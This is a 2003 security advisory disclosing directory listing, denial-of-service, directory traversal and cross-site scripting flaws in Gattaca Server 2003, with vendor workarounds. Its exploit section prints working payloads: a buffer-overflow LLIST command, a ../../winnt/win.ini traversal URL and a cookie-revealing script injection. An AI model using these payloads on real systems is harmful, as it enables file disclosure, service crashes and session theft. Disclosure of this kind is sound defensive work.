SCSA019.txt

`=====================================================================  
Security Corporation Security Advisory [SCSA-019]  
  
Gattaca Server 2003 Vulnerable to Multiple vulnerabilities  
=====================================================================  
  
PROGRAM: Gattaca Server 2003  
HOMEPAGE: www.gattaca-server.com  
VULNERABLE VERSIONS: 1.0.8.1 and prior ?  
RISK: Low/Medium  
IMPACT: Show file and directory content  
Denial of Service  
Directory Traversal  
Cross Site Scripting  
RELEASE DATE: 2003-07-10  
  
Security Corporation's Free weekly Newsletter :  
http://www.security-corporation.com/newsletter.html  
  
=====================================================================  
TABLE OF CONTENTS  
=====================================================================  
  
1..........................................................DESCRIPTION  
2..............................................................DETAILS  
3.............................................................EXPLOITS  
4............................................................SOLUTIONS  
5...........................................................WORKAROUND  
6..................................................DISCLOSURE TIMELINE  
7..............................................................CREDITS  
8...........................................................DISCLAIMER  
9...........................................................REFERENCES  
10............................................................FEEDBACK  
  
1. DESCRIPTION  
=====================================================================  
  
Gattaca Server is "A high performance Windows NT based Mail and Web  
Server software for building own intranet. You may register unlimited  
users, use unlimited domains. Supporting POP3, SMTP, and HTTP  
protocols.  
Integrated with TMPL library, allow you write own CGI scripts"  
  
(direct quote from http://www.gattaca-server.com/)  
  
  
2. DETAILS  
=====================================================================  
  
- Shows file and directory content :  
  
When sending a GET with 2 slashes ("//"), then the server shows all  
files in the directory content. An attacker can see all hidden  
(non-HTML linked) files and directories on the server.  
  
  
- Denial of Service :  
  
A security vulnerability in Gattaca Server 2003 allows remote and  
local attackers to cause the server to crash by executing a specific  
command (LLIST) with a buffer of 1048 bytes in length or more.  
  
The command can be issued to the server either by using the Gattaca  
Console.(C:\WINNT\system32\gattaca.exe)  
  
  
- Directory Traversal :  
  
A security vulnerability in Gattaca Server 2003 allows remote  
attackers to gain access to system files.  
  
  
- Cross Site Scripting :  
  
A exploitable bug was found in Gattaca Server 2003 which cause  
script execution on client's computer by following a crafted url.  
  
This kind of attack known as "Cross-Site Scripting Vulnerability"  
is present in view2.tmpl file, an attacker can input specially crafted  
links and/or other malicious scripts.  
  
  
  
  
3. EXPLOIT  
=====================================================================  
  
- Show file and directory content :  
  
http://[target]//  
  
You will get this :  
http://www.security-corporation.com/download/SCSA-019.png  
  
  
- Denial of Service :  
  
In Gattaca Console :  
  
$> LLIST AAAA...[1024]...AAAA  
  
ggesvr32.exe crash at once.  
  
  
- Directory Traversal :  
  
http://[target]/view.tmpl?testfile=../../winnt/win.ini  
  
  
- Cross Site Scripting :  
  
http://[target]/view2.tmpl?text=[hostile_code]  
  
The hostile code could be :  
  
[script]alert("Cookie="+document.cookie)[/script]  
  
(open a window with the cookie of the visitor.)  
  
(replace [] by <>)  
  
  
  
  
  
4. SOLUTIONS  
=====================================================================  
  
No solution for the moment. Vendor fix bugs in the next release.  
  
  
5. WORKAROUND  
=====================================================================  
  
- Show file and directory content :  
  
Vendor response :  
  
For fix this issue, you also need provide additional task  
  
http://[target]//  
  
2 ways:  
  
1) Open notepad %systemroot%\gattaca.ini and remove extension for  
configuration file  
  
====================================  
[GATTACA]  
PATH=C:\GeeOSPub  
ENVIRONMENT=C:\GeeOSPub\wwwroot\.config  
SITE=C:\GeeOSPub\wwwroot\.config  
====================================  
  
Last 2 strings maybe removed, restarting is not needed.  
New configuration settings will be updated by Gattaca  
Server in 15 seconds.  
  
====================================  
[GATTACA]  
PATH=C:\GeeOSPub  
#ENVIRONMENT=C:\GeeOSPub\wwwroot\.config  
#SITE=C:\GeeOSPub\wwwroot\.config  
====================================  
  
but you got problem with site sample, and best way is:  
  
2) You may update C:\GeeOSPub\wwwroot\.config file too, it also has  
structure  
  
=====================  
[HTTPFOLDER]  
/=1  
=====================  
  
Changed it to  
  
=====================  
[HTTPFOLDER]  
/=0  
=====================  
  
Also if you need view directory index of any folder append your  
variables look like:  
  
<url>=<status>  
  
where status is 1 allowed to view, and 0 disabled view.  
for example:  
  
[HTTPFOLDER]  
/=0  
/pub=1  
/pub/private=0  
  
Also it is impossible view files started with dot (like .config etc), if  
any clients want hide some files from directory index they should start  
names of files from dot. It's by design.  
  
  
- Denial of Service :  
  
Vendor response :  
  
For LLIST command, this is real problem too. But it's possible limit  
access to computer where Gattaca Server installed.  
  
- Directory Traversal :  
  
Remove view.tmpl  
  
  
- Cross Site Scripting :  
  
Use the function php eregi_replace to filter the input data or  
remove view2.tmpl  
  
Vendor response :  
  
For exploit (http://[target]/view2.tmpl?text=[hostile_code]) it is not  
bug, because response to this GET/POST request got only attacker. And it  
impossible to control server response to another client(s). It's by  
design. This script (view2.tmpl) made for this purposes (allowing  
end-user insert own code/text to output html), and if this work it is  
fine. This mean that Gattaca Server properly configured, and work well.  
For our opinion this is not bug or exploid, it is possible send data to  
this script using GET/POST (POST it's better because client can send  
more data)  
  
  
6. DISCLOSURE TIMELINE  
=====================================================================  
  
08/07/2003 Vulnerability discovered  
08/07/2003 Vendor notified  
09/07/2003 Vendor response  
09/07/2003 Security Corporation clients notified  
09/07/2003 Started e-mail discussions  
10/07/2003 Last e-mail received  
10/07/2003 Public disclosure  
  
  
7. CREDITS  
=====================================================================  
  
Discovered by Gregory Le Bras <[email protected]>  
  
  
8. DISLAIMER  
=====================================================================  
  
The information within this paper may change without notice. Use of  
this information constitutes acceptance for use in an AS IS condition.  
There are NO warranties with regard to this information. In no event  
shall the author be liable for any damages whatsoever arising out of  
or in connection with the use or spread of this information. Any use  
of this information is at the user's own risk.  
  
  
9. REFERENCES  
=====================================================================  
  
- Original Version:  
http://www.security-corporation.com/advisories-019.html  
  
- Version Française:  
http://www.security-corporation.com/index.php?id=advisories&a=019-FR  
  
  
10. FEEDBACK  
=====================================================================  
  
Please send suggestions, updates, and comments to:  
  
Security Corporation  
http://www.security-corporation.com  
[email protected]  
  
  
  
  
  
`